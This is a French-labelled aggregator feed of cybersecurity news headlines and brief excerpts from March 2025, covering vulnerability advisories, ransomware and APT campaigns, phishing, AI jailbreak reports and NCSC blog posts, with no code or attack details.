Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cisco Warns of Critical IOS XR Vulnerability Enabling DoS Attacks
Cisco has issued a security advisory warning of a vulnerability in its IOS XR Software that could allow attackers to launch denial-of-service (DoS) attacks.  The vulnerability, identified as CVE-2025-20115, affects the Border Gateway Protocol (BGP) confederation implementation. The CVE-2025-20115 vulnerability affects the Border Gateway Protocol (BGP) confederation implementation in Cisco IOS XR Software, potentially allowing […] The post Cisco Warns of Critical IOS XR Vulnerability Enabling DoS Attacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/cisco-warns-of-critical-ios-xr-vulnerability/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

DeepSeek R1 Jailbreaked to Create Malware, Including Keyloggers and Ransomware
The increasing popularity of generative artificial intelligence (GenAI) tools, such as OpenAI's ChatGPT and Google's Gemini, has attracted cybercriminals seeking to exploit these technologies for malicious purposes. Despite the guardrails implemented by traditional GenAI platforms to prevent misuse, cybercriminals have circumvented these restrictions by developing their own malicious large language models (LLMs), including WormGPT, FraudGPT, […] The post DeepSeek R1 Jailbreaked to Create Malware, Including Keyloggers and Ransomware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/deepseek-r1-jailbreaked-to-create-malware/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New Context Compliance Exploit Jailbreaks Major AI Models
Microsoft researchers have uncovered a surprisingly straightforward method that can bypass safety guardrails in most leading AI systems. In a technical blog post published on March 13, 2025, Microsoft’s Mark Russinovich detailed the “Context Compliance Attack” (CCA), which exploits the common practice of relying on client-supplied conversation history. The attack proves effective against numerous major […] The post New Context Compliance Exploit Jailbreaks Major AI Models appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/context-compliance-exploit-jailbreaks-major-ai-models/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

SuperBlack Ransomware operators exploit Fortinet Firewall flaws in recent attacks
Operators behind the SuperBlack ransomware exploited two vulnerabilities in Fortinet firewalls for recent attacks. Between January and March, researchers at Forescout Research – Vedere Labs observed a threat actors exploiting two Fortinet vulnerabilities to deploy the SuperBlack ransomware. The experts attribute the attacks to a threat actor named “Mora_001” which using Russian-language artifacts and exhibiting […]
https://securityaffairs.com/175402/cyber-crime/superblack-ransomware-exploited-fortinet-firewall-flaws.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Securing Your Azure Linux Environment: What's New in Azure Linux 3.0.20250311
Microsoft recently unveiled an important update to its Azure Linux distribution , Azure 3.0.20250311, offering numerous critical package updates to boost security by addressing several CVEs. From core Linux 6.6 LTS kernel updates through popular applications like Curl, InfluxDB and Node.js. Azure Linux users running this release benefit from stronger protection against kernel exploits and common application vulnerabilities that threaten system integrity and security.
https://linuxsecurity.com/news/vendors-products/azure-linux-3-0-20250311-released
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cisco Warns of IOS XR Software Vulnerability That Let Attackers Trigger DoS condition
Cisco has issued security advisories for multiple vulnerabilities affecting its IOS XR Software, with particular emphasis on a significant memory corruption vulnerability in the Border Gateway Protocol (BGP) confederation implementation.  The vulnerability tracked as CVE-2025-20115, with a CVSS score of 8.6, could allow unauthenticated, remote attackers to cause denial-of-service conditions on affected network infrastructure. The […] The post Cisco Warns of IOS XR Software Vulnerability That Let Attackers Trigger DoS condition appeared first on Cyber Security News.
https://cybersecuritynews.com/cisco-warns-of-ios-xr-software-vulnerability/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Critical ruby-saml Vulnerabilities Let Attackers Bypass Authentication
Two critical authentication bypass vulnerabilities have been discovered in the ruby-saml library, potentially exposing numerous web applications to account takeover attacks.  Security researchers from GitHub Security Lab have identified parser differential vulnerabilities (CVE-2025-25291 and CVE-2025-25292) affecting ruby-saml versions up to 1.17.0, which could allow attackers to impersonate any user within affected systems. GitHub reports that […] The post Critical ruby-saml Vulnerabilities Let Attackers Bypass Authentication appeared first on Cyber Security News.
https://cybersecuritynews.com/ruby-saml-vulnerabilities-bypass-authentication/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Keeper Security Gives Its Partner Programme an update
Keeper Security has announced the launch of the updated Keeper Partner Programme. The updated programme is designed to help organisations of all sizes expand their cybersecurity offerings and unlock new revenue opportunities.  As businesses increasingly adopt PAM solutions to protect privileged credentials, secrets and remote access, Keeper's programme provides comprehensive partner tiers, extensive training and […] The post Keeper Security Gives Its Partner Programme an update appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/03/14/keeper-security-gives-its-partner-programme-an-update/?utm_source=rss&utm_medium=rss&utm_campaign=keeper-security-gives-its-partner-programme-an-update
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Lazarus Hackers Exploiting IIS Servers to Deploy ASP-based Web Shells
Researchers have identified a series of sophisticated attacks by the notorious Lazarus group targeting South Korean web servers.  The threat actors have been breaching IIS servers to deploy ASP-based web shells, which are subsequently used as first-stage Command and Control (C2) servers that proxy communications to second-stage C2 infrastructure.  These attacks, identified in January 2025, […] The post Lazarus Hackers Exploiting IIS Servers to Deploy ASP-based Web Shells appeared first on Cyber Security News.
https://cybersecuritynews.com/lazarus-hackers-exploiting-iis-servers/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Lazarus Group Weaponizes IIS Servers for Deploying Malicious ASP Web Shells
The notorious Lazarus group has been identified as leveraging compromised IIS servers to deploy malicious ASP web shells. These sophisticated attacks have been reported to facilitate the spread of malware, including the LazarLoader variant, and utilize privilege escalation tools to gain extensive control over infected systems. The Lazarus group, associated with North Korean actors, has […] The post Lazarus Group Weaponizes IIS Servers for Deploying Malicious ASP Web Shells appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/lazarus-group-weaponizes-iis-servers/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Critical ruby-saml Vulnerabilities Allow Attackers to Bypass Authentication
A critical security vulnerability has been identified in the ruby-saml library, a popular tool used for Single Sign-On (SSO) via Security Assertion Markup Language (SAML) on the service provider side. The vulnerabilities, designated as CVE-2025-25291 and CVE-2025-25292, allow attackers to bypass authentication and conduct account takeover attacks if they possess a valid signature created with […] The post Critical ruby-saml Vulnerabilities Allow Attackers to Bypass Authentication appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/critical-ruby-saml-vulnerabilities/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Off the Beaten Path: Recent Unusual Malware
Three unusual malware samples analyzed here include an ISS backdoor developed in a rare language, a bootkit and a Windows implant of a post-exploit framework. The post Off the Beaten Path: Recent Unusual Malware appeared first on Unit 42.
https://unit42.paloaltonetworks.com/unusual-malware/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ongoing Cyber Attack Mimic Booking.com to Spread Password-Stealing Malware
Microsoft Threat Intelligence has identified an ongoing phishing campaign that began in December 2024, targeting organizations in the hospitality industry by impersonating the online travel agency Booking.com. The campaign, tracked as Storm-1865, employs a sophisticated social engineering technique called ClickFix to deliver credential-stealing malware designed to conduct financial fraud and theft. This attack specifically targets […] The post Ongoing Cyber Attack Mimic Booking.com to Spread Password-Stealing Malware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/ongoing-cyber-attack-mimic-booking-com/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-7328-3: Linux kernel vulnerabilities
Attila Szász discovered that the HFS+ file system implementation in the Linux Kernel contained a heap overflow vulnerability. An attacker could use a specially crafted file system image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2025-0927) Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system. This update corrects flaws in the following subsystems: - Block layer subsystem; (CVE-2024-56672)
https://ubuntu.com/security/notices/USN-7328-3
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

U.S. Charges LockBit Ransomware Developer in Cybercrime Crackdown
The U.S. Department of Justice has charged Rostislav Panev, a dual Russian and Israeli national, for his role as a developer of the notorious LockBit ransomware group. Panev, 51, was arrested in Israel in August following a U.S. provisional arrest request, and he is currently awaiting extradition to the United States. This action marks a […] The post U.S. Charges LockBit Ransomware Developer in Cybercrime Crackdown appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/u-s-charges-lockbit-ransomware-developer/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

GraphQL Vulnerabilities: A Complete Guide to Security Testing and Advanced Exploitation Techniques
Disclaimer: This document is for educational purposes only. Exploiting systems without authorization is illegal and punishable by law.Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/graphql-vulnerabilities-a-complete-guide-to-security-testing-and-advanced-exploitation-techniques-5eb94af945c0?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Flipper Zero Episode 1: What It Is, What You Can Do, and How to Set It Up ?
CreditWelcome to the first post in this Flipper Zero series! If you've ever been curious about this little hacking gadget, you're in the right place. Flipper Zero is a fun yet powerful multi-tool designed for security professionals, tinkerers, and tech enthusiasts alike. In this post, we'll cover Flipper Zero's features, what you can do with it, and how to set it up.What Is Flipper Zero?Flipper Zero is a pocket-sized cyber Swiss Army knife built for exploring and interacting with various types of hardware. Despite its toy-like appearance, it's packed with serious capabilities for hacking, testing, and experimenting with different wireless protocols and electronic devices.What's Inside?A peek inside the Flipper ZeroWhat Can You Do With Flipper Zero?From RFID cloning to controlling...
https://infosecwriteups.com/flipper-zero-episode-1-what-it-is-what-you-can-do-and-how-to-set-it-up-bb372e603baa?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The art of hunting logical bugs: Exploiting business logic in modern apps
IntroductionContinue reading on InfoSec Write-ups »
https://infosecwriteups.com/the-art-of-hunting-logical-bugs-exploiting-business-logic-in-modern-apps-a374c3650b90?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

JWT Security in 2025: Are We Finally Free from Leaks?
If you’ve been working with authentication systems for a while, you already know the deal with JWTs. They’re everywhere. From API…Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/jwt-security-in-2025-are-we-finally-free-from-leaks-3552fce24690?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AI Chatbot DeepSeek R1 Can Be Manipulated to Create Malware
Tenable Research reveals that AI chatbot DeepSeek R1 can be manipulated to generate keyloggers and ransomware code. While…
https://hackread.com/ai-chatbot-deepseek-r1-manipulated-to-create-malware/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

U.S. CISA adds Apple products and Juniper Junos OS flaws to its Known Exploited Vulnerabilities catalog
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Apple products and Juniper Junos OS flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: The vulnerability CVE-2025-21590 is an Improper Isolation or Compartmentalization issue in the kernel of Juniper Networks Junos OS […]
https://securityaffairs.com/175381/security/u-s-cisa-adds-apple-juniper-junos-os-flaws-known-exploited-vulnerabilities-catalog.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

L'Actu à J-2 (Presse spécialisée)

GitLab addressed critical auth bypass flaws in CE and EE
GitLab addressed two critical authentication bypass vulnerabilities in Community Edition (CE) and Enterprise Edition (EE). GitLab released security updates to address critical vulnerabilities in Community Edition (CE) and Enterprise Edition (EE). The company addressed nine vulnerabilities, including the two critical ruby-saml authentication bypass issues respectively tracked as CVE-2025-25291 and CVE-2025-25292. GitLab CE/EE versions 17.7.7, 17.8.5, […]
https://securityaffairs.com/175370/security/gitlab-addressed-critical-flaws-in-ce-and-ee.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

OBSCURE#BAT Malware Highlights Risks of API Hooking
Researchers discovered an attack chain that uses several layers of obfuscated batch files and PowerShell scripts to deliver an advanced and persistent rootkit.
https://www.darkreading.com/vulnerabilities-threats/obscurebat-malware-highlights-api-hooking
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

FBI, CISA Raise Alarms As Medusa Ransomware Attacks Grow
Medusa developers have been targeting a wide variety of critical infrastructure sectors, from healthcare and technology to manufacturing and insurance, racking up its victim count as it seemingly adds to its numbers of affiliates.
https://www.darkreading.com/cyberattacks-data-breaches/fbi-cisa-alarmed-medusa-ransomware-attacks-grow
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

FBI and CISA Urge Enabling 2FA to Counter Medusa Ransomware
FBI and CISA warn of Medusa ransomware attacks impacting critical infrastructure. Learn about Medusa’s tactics, prevention tips, and…
https://hackread.com/fbi-cisa-urge-enabling-2fa-counter-medusa-ransomware/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft apologizes for removing VSCode extensions used by millions
Microsoft has reinstated the 'Material Theme - Free' and 'Material Theme Icons - Free' extensions on the Visual Studio Marketplace after finding that the obfuscated code they contained wasn't actually malicious. [...]
https://www.bleepingcomputer.com/news/microsoft/microsoft-apologizes-for-removing-vscode-extensions-used-by-millions/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The True Cost of Cybercrime: Why Global Damages Could Reach .2 – .5 Trillion by End of Year 2025
Introduction: The Escalating Economic Threat of Cybercrime Cybercrime is no longer just an IT problem—it has evolved into a global economic crisis, affecting corporations, governments, and individuals alike. With increasing... The post The True Cost of Cybercrime: Why Global Damages Could Reach .2 – .5 Trillion by End of Year 2025 appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/the-true-cost-of-cybercrime-why-global-damages-could-reach-1-2-1-5-trillion-by-end-of-year-2025/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New SuperBlack ransomware exploits Fortinet auth bypass flaws
A new ransomware operator named 'Mora_001' is exploiting two Fortinet vulnerabilities to gain unauthorized access to firewall appliances and deploy a custom ransomware strain dubbed SuperBlack. [...]
https://www.bleepingcomputer.com/news/security/new-superblack-ransomware-exploits-fortinet-auth-bypass-flaws/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Windows Notepad to get AI text summarization in Windows 11
Microsoft is now testing an AI-powered text summarization feature in Notepad and a Snipping Tool "Draw & Hold" feature that helps draw perfect shapes. [...]
https://www.bleepingcomputer.com/news/microsoft/windows-notepad-to-get-ai-text-summarization-in-windows-11/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ransomware Hits Record High: 126% Surge in Attacks in February 2025
February 2025 saw a record 126% surge in ransomware attacks, with Cl0p leading the charge. Hackers exploited file…
https://hackread.com/ransomware-attacks-hit-record-high-in-february-2025/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What Is Cybersecurity Risk? A Guide to Protect Your Business
Cybersecurity risk affects every business. A single cyber incident, such as a data breach or ransomware attack, can disrupt operations, expose sensitive data, and create costly compliance issues. The challenge is knowing which risks pose the biggest threat to your organization.
https://www.legitsecurity.com/blog/cybersecurity-risk
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What Is Secure Coding? Best Practices and Techniques to Apply
Software vulnerabilities pose serious security and business risks. Writing secure code prevents these issues by integrating security into the development process. Instead of fixing vulnerabilities after deployment, developers apply secure coding practices from the start, reducing risk and building stronger, more resilient applications.
https://www.legitsecurity.com/blog/what-is-secure-coding
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft says button to restore classic Outlook is broken
​Microsoft is investigating a known issue that causes the new Outlook email client to crash when users click the "Go to classic Outlook" button, which should help them switch back to the classic Outlook. [...]
https://www.bleepingcomputer.com/news/microsoft/microsoft-says-button-to-restore-classic-outlook-is-broken/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Strengthening the Human Firewall: Prioritising Mental Health in Cybersecurity Teams
There are few places more challenging than the frontlines of war. Danger lurks at every corner while enemy fire is a persistent threat. It's a hostile and stress-induced environment that demands unwavering focus, and where a single error can have disastrous consequences. Fortunately, the frontlines of war are a place most people won't encounter today. […] The post Strengthening the Human Firewall: Prioritising Mental Health in Cybersecurity Teams appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/03/13/strengthening-the-human-firewall-prioritising-mental-health-in-cybersecurity-teams/?utm_source=rss&utm_medium=rss&utm_campaign=strengthening-the-human-firewall-prioritising-mental-health-in-cybersecurity-teams
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cold Wallets vs. Hot Wallets: Which Offers Better Security?
Cryptocurrency isn't just a buzzword anymore. By December 2024, the number of global cryptocurrency owners reached approximately 659 million, marking a 13% increase from January 2024. That might not sound like a massive chunk, but it still represents millions of individuals who want to protect their virtual holdings. Where regular banking once ruled, self-managed wallets […] The post Cold Wallets vs. Hot Wallets: Which Offers Better Security? appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/03/13/cold-wallets-vs-hot-wallets-which-offers-better-security/?utm_source=rss&utm_medium=rss&utm_campaign=cold-wallets-vs-hot-wallets-which-offers-better-security
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Check Point Software Celebrates Continued Partner Success at UK Partner Awards
Check Point® Software has announced the winners of its UK Partner Awards. The annual awards ceremony, which took place at One Moorgate Place on March 6th, 2025, celebrated the input of Check Point's affiliate companies and the growing partner community across the UK. The 2025 Check Point UK Partner Awards recognised the continued dedication of […] The post Check Point Software Celebrates Continued Partner Success at UK Partner Awards appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/03/13/check-point-software-celebrates-continued-partner-success-at-uk-partner-awards/?utm_source=rss&utm_medium=rss&utm_campaign=check-point-software-celebrates-continued-partner-success-at-uk-partner-awards
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Juniper patches bug that let Chinese cyberspies backdoor routers
​Juniper Networks has released emergency security updates to patch a Junos OS vulnerability exploited by Chinese hackers to backdoor routers for stealthy access. [...]
https://www.bleepingcomputer.com/news/security/juniper-patches-bug-that-let-chinese-cyberspies-backdoor-routers-since-mid-2024/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Consumer Groups Push IoT Security Bill to Address End-of-Life Concerns
Consumer Reports, Secure Resilient Future Foundation (SRFF), and US Public Interest Research Group (PIRG) have introduced a model bill to increase transparency around when Internet of Things devices no longer have manufacturer support.
https://www.darkreading.com/iot/consumer-groups-rally-to-address-iot-security-concerns
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

North Korea-linked APT group ScarCruft spotted using new Android spyware KoSpy
North Korea-linked APT group ScarCruft used a new Android spyware dubbed KoSpy to target Korean and English-speaking users. North Korea-linked threat actor ScarCruft (aka APT37, Reaper, and Group123) is behind a previously undetected Android surveillance tool named KoSpy that was used to target Korean and English-speaking users. ScarCruft has been active since at least 2012, it made the […]
https://securityaffairs.com/175357/malware/scarcruft-used-a-new-android-spyware-dubbed-kospy.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

GitLab patches critical authentication bypass vulnerabilities
GitLab released security updates for Community Edition (CE) and Enterprise Edition (EE), fixing nine vulnerabilities, among which two critical severity ruby-saml library authentication bypass flaws. [...]
https://www.bleepingcomputer.com/news/security/gitlab-patches-critical-authentication-bypass-vulnerabilities/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How MSRC coordinates vulnerability research and disclosure while building community
Learn about the Microsoft Security Response Center, which investigates vulnerabilities and releases security updates to help protect customers from cyberthreats. The post How MSRC coordinates vulnerability research and disclosure while building community appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2025/03/13/how-msrc-coordinates-vulnerability-research-and-disclosure-while-building-community/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Car Exploit Allows You to Spy on Drivers in Real Time
Just like with any regular computer, researchers figured out how to crack into, force restart, and upload malware to an aftermarket in-vehicle infotainment system.
https://www.darkreading.com/vulnerabilities-threats/car-exploit-spy-drivers-real-time
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

HealthTech Database Exposed 108GB Medical and Employment Records
A misconfigured database exposed 108.8 GB of sensitive data, including information on over 86,000 healthcare workers affiliated with…
https://hackread.com/healthtech-database-exposed-medical-employment-records/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Setting the Record Straight: Debunking Myths About Mainframe Security in Cyber Strategies
Earlier this year, the modern mainframe celebrated its 60th anniversary, underscoring its ongoing significance. According to this 2024 Forrester report, 61% of global infrastructure hardware decision-makers confirm their firms still rely... The post Setting the Record Straight: Debunking Myths About Mainframe Security in Cyber Strategies appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/setting-the-record-straight-debunking-myths-about-mainframe-security-in-cyber-strategies/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClickFix attack delivers infostealers, RATs in fake Booking.com emails
Microsoft is warning that an ongoing phishing campaign impersonating Booking.com is using ClickFix social engineering attacks to infect hospitality workers with various malware, including infostealers and RATs. [...]
https://www.bleepingcomputer.com/news/security/clickfix-attack-delivers-infostealers-rats-in-fake-bookingcom-emails/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Mobile Security & Malware Issue 2025년 3월 2주차
ASEC Blog publishes “Android Malware & Security Issue 2st Week of March, 2025”
https://asec.ahnlab.com/en/86827/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Phishing campaign impersonates Booking .com, delivers a suite of credential-stealing malware
Starting in December 2024, leading up to some of the busiest travel days, Microsoft Threat Intelligence identified a phishing campaign that impersonates online travel agency Booking.com and targets organizations in the hospitality industry. The campaign uses a social engineering technique called ClickFix to deliver multiple credential-stealing malware in order to conduct financial fraud and theft. […] The post Phishing campaign impersonates Booking .com, delivers a suite of credential-stealing malware appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2025/03/13/phishing-campaign-impersonates-booking-com-delivers-a-suite-of-credential-stealing-malware/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Don’t let your kids on Roblox if you’re not comfortable, says Roblox CEO
To parents worried about their children's presence on Roblox, the CEO said don't let your kids be on Roblox.
https://www.malwarebytes.com/blog/news/2025/03/dont-let-your-kids-on-roblox-if-youre-worried-says-roblox-ceo
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-7351-1: RESTEasy vulnerabilities
Nikos Papadopoulos discovered that RESTEasy improperly handled URL encoding when certain errors occur. An attacker could possibly use this issue to modify the app's behavior for other users through the network. (CVE-2020-10688) Mirko Selber discovered that RESTEasy improperly validated user input during HTTP response construction. This issue could possibly allow an attacker to cause a denial of service or execute arbitrary code. (CVE-2020-1695) It was discovered that RESTEasy unintentionally disclosed potentially sensitive server information to users during the handling of certain errors. (CVE-2020-25633) It was discovered that RESTEasy unintentionally disclosed parts of its code to users during the handling of certain errors. (CVE-2021-20289) It was discovered that RESTEasy used improper...
https://ubuntu.com/security/notices/USN-7351-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Experts warn of a coordinated surge in the exploitation attempts of SSRF vulnerabilities
Researchers warn of a “coordinated surge” in the exploitation attempts of SSRF vulnerabilities in multiple platforms. Threat intelligence firm GreyNoise observed Grafana path traversal exploitation attempts before the Server-Side Request Forgery (SSRF) surge on March 9, suggesting the attackers may be leveraging Grafana as an initial entry point for deeper exploitation. The experts believe the […]
https://securityaffairs.com/175344/hacking/coordinated-surge-exploitation-attempts-ssrf-vulnerabilities.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New OBSCURE#BAT Malware Targets Users with Fake Captchas
OBSCURE#BAT malware campaign exploits social engineering & fake software downloads to evade detection, steal data and persist on…
https://hackread.com/new-obscurebat-malware-targets-users-fake-captchas/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Salt Typhoon: A Wake-up Call for Critical Infrastructure
The Salt Typhoon attacks underscored the need for unity, innovation, and resilience in the face of an increasingly sophisticated cyber-threat landscape.
https://www.darkreading.com/cyberattacks-data-breaches/salt-typhoon-wake-up-call-critical-infrastructure
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Trillion Question: Can America's Cyber Czar Shrink The Skills Gap?
This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Mar. 13, 2025 In Apr. 2019, Kristi Noem, Governor of South Dakota at the time, and now U.S. Secretary of Homeland Security (DHS), wrote that “the cost of cyberattacks is climbing, and The post The Trillion Question: Can America’s Cyber Czar Shrink The Skills Gap? appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/the-10-trillion-question-can-americas-cyber-czar-shrink-the-skills-gap/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Strength in Unity: OpenInfra & Linux Foundation Join to Revolutionize Open-source Security
Exciting news has just reached the open-source community: OpenStack , now known as OpenInfra Foundation , is joining forces with the Linux Foundation . This significant move promises greater collaboration and operational efficiency throughout the community.
https://linuxsecurity.com/news/organizations-events/openinfra-linux-foundations-open-source-security
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Guardians of AIoT: Protecting Smart Devices from Data Poisoning
What if the smart thermostat in your home decides that winter is the perfect time for you to experience tropical heat or your self-driving car interprets a stop sign as... The post Guardians of AIoT: Protecting Smart Devices from Data Poisoning appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/guardians-of-aiot-protecting-smart-devices-from-data-poisoning/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Why Critical MongoDB Library Flaws Won't See Mass Exploitation
Discover how to mitigate CVE-2024-53900 and CVE-2025-23061, which expose Node.js APIs to remote attacks.
https://www.f5.com/labs/articles/threat-intelligence/why-critical-mongodb-library-flaws-wont-see-mass-exploitation
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Thinking about the security of AI systems
Why established cyber security principles are still important when developing or implementing machine learning models.
https://www.ncsc.gov.uk/blog-post/thinking-about-security-ai-systems
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

There's a hole in my bucket
...or 'Why do people leave sensitive data in unprotected AWS S3 buckets?'
https://www.ncsc.gov.uk/blog-post/theres-hole-my-bucket
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The problems with patching
Applying patches may be a basic security principle, but that doesn't mean it's always easy to do in practice.
https://www.ncsc.gov.uk/blog-post/the-problems-with-patching
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The strength of the ICS COI is the team
Join the Industrial Control System Community of Interest (ICS COI), and help build CNI expertise across the UK.
https://www.ncsc.gov.uk/blog-post/strength-of-ics-coi-is-the-team
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The security benefits of modern collaboration in the cloud
By exploiting cloud services, organisations no longer have to choose between ‘more security' and ‘better usability'.
https://www.ncsc.gov.uk/blog-post/the-security-benefits-of-modern-collaboration-in-the-cloud
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The problems with forcing regular password expiry
Why the NCSC decided to advise against this long-established security guideline.
https://www.ncsc.gov.uk/blog-post/problems-forcing-regular-password-expiry
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The logic behind three random words
Whilst not a password panacea, using 'three random words' is still better than enforcing arbitrary complexity requirements.
https://www.ncsc.gov.uk/blog-post/the-logic-behind-three-random-words
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The future of telecoms in the UK
NCSC Technical Director Dr Ian Levy explains how the security analysis behind the DCMS supply chain review will ensure the UK's telecoms networks are secure – regardless of the vendors used.
https://www.ncsc.gov.uk/blog-post/the-future-of-telecoms-in-the-uk
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The future of Technology Assurance in the UK
Chris Ensor highlights some important elements of the NCSC's new Technology Assurance strategy.
https://www.ncsc.gov.uk/blog-post/future-of-technology-assurance-in-the-uk
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Cyber Assessment Framework 3.1
Latest version of the CAF focusses on clarification and consistency between areas of the CAF.
https://www.ncsc.gov.uk/blog-post/the-cyber-assessment-framework-3-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Thanking the vulnerability research community with NCSC Challenge Coins
Reflecting on the positive impact of the Vulnerability Reporting Service – and introducing something new for selected contributors.
https://www.ncsc.gov.uk/blog-post/thanking-vulnerability-research-community-ncsc-challenge-coins
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Terminology: it's not black and white
The NCSC now uses 'allow list' and 'deny list' in place of 'whitelist' and 'blacklist'. Emma W explains why...
https://www.ncsc.gov.uk/blog-post/terminology-its-not-black-and-white
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Meta warns of actively exploited flaw in FreeType library
Meta warned that a vulnerability, tracked as CVE-2025-27363, impacting the FreeType library may have been exploited in the wild. Meta warned that an out-of-bounds write flaw, tracked as CVE-2025-27363 (CVSS score of 8.1), in the FreeType library may have been actively exploited in attacks. “An out of bounds write exists in FreeType versions 2.13.0 and below when attempting to […]
https://securityaffairs.com/175337/hacking/meta-warned-actively-exploited-cve-2025-27363.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-7344-2: Linux kernel vulnerabilities
Chenyuan Yang discovered that the CEC driver driver in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2024-23848) Attila Szász discovered that the HFS+ file system implementation in the Linux Kernel contained a heap overflow vulnerability. An attacker could use a specially crafted file system image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2025-0927) Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system. This update corrects flaws in the following subsystems: - PowerPC architecture; - GPIO subsystem; - GPU drivers; - Media...
https://ubuntu.com/security/notices/USN-7344-2
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

INE Security Alert: Using AI-Driven Cybersecurity Training to Counter Emerging Threats
Cary, North Carolina, 13th March 2025, CyberNewsWire
https://hackread.com/ine-security-alert-using-ai-driven-cybersecurity-training-to-counter-emerging-threats/
